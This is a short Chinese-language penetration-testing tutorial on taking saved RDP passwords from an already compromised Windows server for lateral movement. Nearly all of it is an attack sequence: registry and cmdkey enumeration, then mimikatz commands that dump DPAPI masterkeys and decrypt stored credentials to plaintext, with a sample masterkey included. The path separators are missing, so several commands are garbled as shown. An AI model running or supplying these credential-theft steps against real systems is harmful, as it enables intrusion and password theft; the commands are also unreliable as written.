前言
在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。
0x01 密码凭证获取
查看当前主机本地连接过的目标机器记录
代码语言:javascript复制reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
查看当前主机保存的RDP凭据
代码语言:javascript复制cmdkey /list
查看本地用户是否存有RDP密码文件
代码语言:javascript复制dir /a %userprofile%AppDataLocalMicrosoftCredentials*
选择密码文件,使用mimikatz对其文件进行解密,并记录下guidMasterKey的值
代码语言:javascript复制mimikatz.exe "privilege::debug" "dpapi::cred /in:C:Usersadministrator.LUCKYSECAppDataLocalMicrosoftCredentials5490905D7B7F0E87893DE8FCE6CC1710" exit
根据guidMasterKey,使用mimikatz找到对应的Masterkey
代码语言:javascript复制mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > dpapi.txt
通过Masterkey,使用mimikatz解密pbData数据,获取RDP连接明文密码
代码语言:javascript复制mimikatz.exe "privilege::debug" "dpapi::cred /in:C:Usersadministrator.LUCKYSECAppDataLocalMicrosoftCredentials5490905D7B7F0E87893DE8FCE6CC1710 /masterkey:c7c73d9e7a83ed8991e7a0de7942a5ab6c8924ff71c33ef8370a5294f677042787f311c534977476cbe6514ae2ba77d11172fbd5b6a51ff188f87d720b44fee1" exit
参考文章
- https://mp.weixin.qq.com/s/4nlyOIuyQZ9h0Bb5jQO4wQ
